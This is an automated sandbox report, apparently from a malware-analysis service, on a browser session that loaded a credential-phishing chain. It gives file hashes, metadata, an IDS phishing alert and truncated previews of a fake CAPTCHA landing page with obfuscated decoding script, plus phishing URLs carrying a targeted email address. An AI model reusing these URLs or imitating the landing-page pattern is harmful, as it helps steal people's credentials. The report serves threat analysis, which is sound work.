                                        SHA-256:778B1C1CFBFD9C2616997CDFD6296E5D332D2F6EB82A8B1C9F985C15F5121279
                                        SHA-512:99261166E26FB2AC04C06C7D90C1928C1977476F8A92D38EA006A08AD4BB3C04F2B60A74A6B517258CF7F129C5B3EFD8722A285475283F03AE4DF81359E0EDDA
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....= .o'b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:45:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2675
                                        Entropy (8bit):4.006972375881151
                                        Encrypted:false
                                        SSDEEP:48:8dOdlcTFAizH6idAKZdA1seh/iZUkAQkqehwy+2:8qc5hC9QFy
                                        MD5:21F6A0BCAF39346C720AC13DC3461A21
                                        SHA1:C95709EE7646F5C15F0AB314F58F17743785EF01
                                        SHA-256:8C0D107A73055EA246E1FFDF4C545C28820A878F11D17815CF4D86A89DB0FF2A
                                        SHA-512:0E00B1FBF628E993199FC370DEFB49914DAC8A0BA362A6ECE37C64DBA659F7A4514D9B19A9CFBA7C7784975D6CA9CE0DA0724ED3EA9E1611B0087EAE570C7F54
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....s..o'b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2689
                                        Entropy (8bit):4.016955815179831
                                        Encrypted:false
                                        SSDEEP:48:8/OdlcTFAiAH6idAKZdA14meh7sFiZUkmgqeh7sOy+BX:8sc5hjnEy
                                        MD5:C0721D2EB663D432D2AB6625B7F4AA9D
                                        SHA1:403DF0291B889EBF483934025B6A0A456F41B241
                                        SHA-256:639E3C06D1F914AACDFA1C207AA798D4AB2DC032ABC853979A10D4B43B199A85
                                        SHA-512:8BEE3947AC6D593251A178E010F8911BC0BF3C05BCF37EC1C00870EFB1800516EEFEB956FB2B593A9103C236192DEB2E0347AAC29309B083A63CD5BE2CFE2CF0
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:45:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):4.005845198504544
                                        Encrypted:false
                                        SSDEEP:48:8HDOdlcTFAizH6idAKZdA1TehDiZUkwqehMy+R:8HQc5hZ2y
                                        MD5:FECDCBA469F021C748C56A24F22ACDB5
                                        SHA1:9ED819DB9A4B0FE9B8F2F25264AF5EF1ECE9C2CC
                                        SHA-256:DDCE5DB84AF842DDBB80E609E06A158C5D26DBA00F7495AD11C62FC852D63424
                                        SHA-512:5CB981373AA812B06E10E1D81E6EED11DBAB5B615A026E95BC8C2B1D38C4E521A6A1F8A56B0659E18219319480270541460B17A01E7F114A2B54A9563463EE30
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,..../..o'b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:45:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.993511932111765
                                        Encrypted:false
                                        SSDEEP:48:8kOdlcTFAizH6idAKZdA1dehBiZUk1W1qehiy+C:8bc5hJ9Cy
                                        MD5:123965665506D3EBDBCBA1A038691CD9
                                        SHA1:12E17B4B20FF0AD72450AE0D2E3B2EE22F7911CF
                                        SHA-256:00E2D3FD1331C96DBCEA1F304F14E1D985772D7B43A20DEE1B5C7C57C0EFCBF2
                                        SHA-512:759510F3EABCD8E8A7C04E3510852BAC7D975CACDC01A7364654DB5025A00E2D7DBA06E2E55E10E80F827FCF5EC6CDBB5119C752002292ACA367AD9DB07BA060
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,.....S.o'b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:45:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.002561153020704
                                        Encrypted:false
                                        SSDEEP:48:8oOdlcTFAizH6idAKZdA1duTeehOuTbbiZUk5OjqehOuTbEy+yT+:8/c5hxTfTbxWOvTbEy7T
                                        MD5:B690D783BFA7C52563AE5AE8A2BDB9AF
                                        SHA1:0C916E8033ED5E9220DC453A0A3F7A14479E10F7
                                        SHA-256:7196ACFB82FF648E3E22C640DD04B8E6CBFB4CAD8B33711F67ADEF78186ACA90
                                        SHA-512:3FB63226296DE8242C3CFB958EE52A904BB5BB8C21F2C0E759663A94AC5920B7FEB5A4500B4F5653A756782082CE128D37B4AA745066C617D914FC1EBA637954
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....Llvo'b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (1899)
                                        Category:downloaded
                                        Size (bytes):5746
                                        Entropy (8bit):5.36872363340471
                                        Encrypted:false
                                        SSDEEP:96:ftGyE+40Wa0PeyMaf4SlpRsWYyXA6yV/iXanFISch+rsqst7W:fcyE+40Wa0GyMaf4SDRsWYyXdyTpbrs6
                                        MD5:5737A673BAA9F785F810832AABEE7DD3
                                        SHA1:613B5A85BFBC4888ACA506C700964D9C6010BECF
                                        SHA-256:2F3E3BB74CEF0F7F18CEB90EEF2F55BA308F09F29775320A256F51CB7987EAF9
                                        SHA-512:4D528891A0F25224EFA1E088ABAAFC8616A65DE5C9EDE214C2140892AF892C5348AF7C813543CFD0BCD4C1E0688DEE225F9FEFC65DD1CBBCBED2E58AEBF2C8AE
                                        Malicious:false
                                        Reputation:low
                                        URL:https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/favicon.ico
                                        Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAA4FpD7uVAQN4KLZ", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (1899)
                                        Category:dropped
                                        Size (bytes):5746
                                        Entropy (8bit):5.36872363340471
                                        Encrypted:false
                                        SSDEEP:96:ftGyE+40Wa0PeyMaf4SlpRsWYyXA6yV/iXanFISch+rsqst7W:fcyE+40Wa0GyMaf4SDRsWYyXdyTpbrs6
                                        MD5:5737A673BAA9F785F810832AABEE7DD3
                                        SHA1:613B5A85BFBC4888ACA506C700964D9C6010BECF
                                        SHA-256:2F3E3BB74CEF0F7F18CEB90EEF2F55BA308F09F29775320A256F51CB7987EAF9
                                        SHA-512:4D528891A0F25224EFA1E088ABAAFC8616A65DE5C9EDE214C2140892AF892C5348AF7C813543CFD0BCD4C1E0688DEE225F9FEFC65DD1CBBCBED2E58AEBF2C8AE
                                        Malicious:false
                                        Reputation:low
                                        Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAA4FpD7uVAQN4KLZ", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 11 x 90, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):4.068159130770306
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPl6H4+kxl/k4E08up:6v/lhP8Y+k7Tp
                                        MD5:EC94EDB843E50418C6250B6B61FE34BE
                                        SHA1:260D46D95A2ED00253C50C336E4ACA39722F9F71
                                        SHA-256:5F63B231C08E72261427733FE9C82492A82946C198BC74A2855DCD6F506A00E0
                                        SHA-512:3726E1362ED6761CAA640FF09339A7458FE3FE2B6A5C54A811419816622748FE6B3A21E6EF01D4D0EC71D3FBC48E6C96ED9A604A1F342C0A5C18BC58D0B26A94
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yve
                                        Preview:.PNG........IHDR.......Z.......;#....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):313
                                        Entropy (8bit):5.710448024871343
                                        Encrypted:false
                                        SSDEEP:6:YQxbNLSFr4g70x1U/VQX6pD7Atpv8se0BK4XAJIaba1ml93P0h4TIxy:YIJy/tvHAfEseUK4XAJw+3PPt
                                        MD5:FDAA2E4FAB5FA187F7DAE229AE53E399
                                        SHA1:4E0F036F9DB4F5B1CCAE532C35ECD4C8450E1C71
                                        SHA-256:C2E71055397D02C9F593E69BECB8F4F0008C742588BAAD850B16D4FCF41918BC
                                        SHA-512:F3518A2DC2413B319304BCCBB34C1234BD4758267B66E57183893F80614433BC3FB872550187E23ABF8EB7C439ACC33A2794A9BAEFE88C8062B3518B8E55F513
                                        Malicious:false
                                        Reputation:low
                                        URL:https://moderntoolbc.org/?alqrdsrq&qrc=info@acaglobal.com
                                        Preview:{"url":"https://aask.co.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAwODN9.9mfmPJ6Tz293gVpDft9Bh8PbCFN6r0rJETWVrutJxQo","frame":true}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47520)
                                        Category:downloaded
                                        Size (bytes):47521
                                        Entropy (8bit):5.398500199255723
                                        Encrypted:false
                                        SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                        MD5:301F68F3D8317AB22D4021E266C9A853
                                        SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                        SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                        SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                        Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (1899)
                                        Category:downloaded
                                        Size (bytes):5769
                                        Entropy (8bit):5.37064061657757
                                        Encrypted:false
                                        SSDEEP:96:ftGyE+40Wa0PeyMaX4SlpRsWYyXA6yV/iXanFISch+rsqst7W:fcyE+40Wa0GyMaX4SDRsWYyXdyTpbrs6
                                        MD5:EADC13D44D8BEA1A6B077CDB052711CC
                                        SHA1:3376C382153B93ED130DCFED2B979797CE4613C9
                                        SHA-256:A0C6F4D22122AC70D4C35221C08E9C83053B6CE9A0FB9E79366839AD5B6962BC
                                        SHA-512:50C0EC8243297EA352DF9FDFCB33AF6AEBD5E1C52EDB8B7856B6C66FE606C9DDFBA0611988AA4EAA4550421B5810524B36D0DBA5B0FEB219A467660318E5A3B9
                                        Malicious:false
                                        Reputation:low
                                        URL:https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.com
                                        Preview:<!doctype html>.<html lang="en-US">.<head> . <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> . <title>Just a moment...</title> . <meta content="width=device-width,initial-scale=1" name="viewport"> . <script>. var verifyCallback_CF = function (response) {. if (response && response.length > 10) {. sendRequest(); // Only send the request after CAPTCHA is solved. }. };.. window.onloadTurnstileCallback = function () {. turnstile.render("#turnstileCaptcha", {. sitekey: "0x4AAAAAAA4FpD7uVAQN4KLZ", . callback: verifyCallback_CF,. });. };.. function hh2(encryptedText, shift) {. let decryptedText = "";. for (let i = 0; i < encryptedText.length; i++) {. let c = encryptedText[i];. if (c.match(/[a-z]/i)) {. let code = encryptedText.charCodeAt(i);. if ((code >= 65) && (code <= 90)) {. c = String.fromCharCode(((code -
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (1928)
                                        Category:dropped
                                        Size (bytes):3259
                                        Entropy (8bit):5.236464493177813
                                        Encrypted:false
                                        SSDEEP:48:YUXW4NNPkiWUZxbW7136yKrnVjbv8+qfOcqwFtiGNir38SKZyEk0s4tPj:lGsCUjA1XanFISch+r38SKZdFsiL
                                        MD5:F4FBC36E19AC748F173AF49725E0C161
                                        SHA1:1B3FAEA8EC03E2211904137CC7E7FB672F82F35A
                                        SHA-256:F29F7279866738843277C99A51866D3FC88C48F89A898BA1213CA14797952DD3
                                        SHA-512:8CFDD09A7134904164754240E15B5A0024354A0581279699DCE7315FE71A8FE577E3A3C8B21A47F9AECDE71BAEA80D4100762A94E616E7B2BC4D9C337A08B4F1
                                        Malicious:false
                                        Reputation:low
                                        Preview:.<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback">.</script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewport> <script>var verifyCallback_CF=function (response){var cfForm=document.querySelector("#cfForm"); if (response && response.length > 10){cfForm.submit(); return;}}; window.onloadTurnstileCallback=function (){turnstile.render("#turnstileCaptcha",{sitekey: "0x4AAAAAAA4FN2SQeb_s4738", callback: verifyCallback_CF,});};.</script></head><style>.h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (47520)
                                        Category:dropped
                                        Size (bytes):47521
                                        Entropy (8bit):5.398500199255723
                                        Encrypted:false
                                        SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                        MD5:301F68F3D8317AB22D4021E266C9A853
                                        SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                        SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                        SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                        Malicious:false
                                        Reputation:low
                                        Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 11 x 90, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):4.068159130770306
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPl6H4+kxl/k4E08up:6v/lhP8Y+k7Tp
                                        MD5:EC94EDB843E50418C6250B6B61FE34BE
                                        SHA1:260D46D95A2ED00253C50C336E4ACA39722F9F71
                                        SHA-256:5F63B231C08E72261427733FE9C82492A82946C198BC74A2855DCD6F506A00E0
                                        SHA-512:3726E1362ED6761CAA640FF09339A7458FE3FE2B6A5C54A811419816622748FE6B3A21E6EF01D4D0EC71D3FBC48E6C96ED9A604A1F342C0A5C18BC58D0B26A94
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR.......Z.......;#....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        No static file info
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-09T00:45:49.637655+01002057301ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-071104.21.32.1443192.168.2.1649722TCP
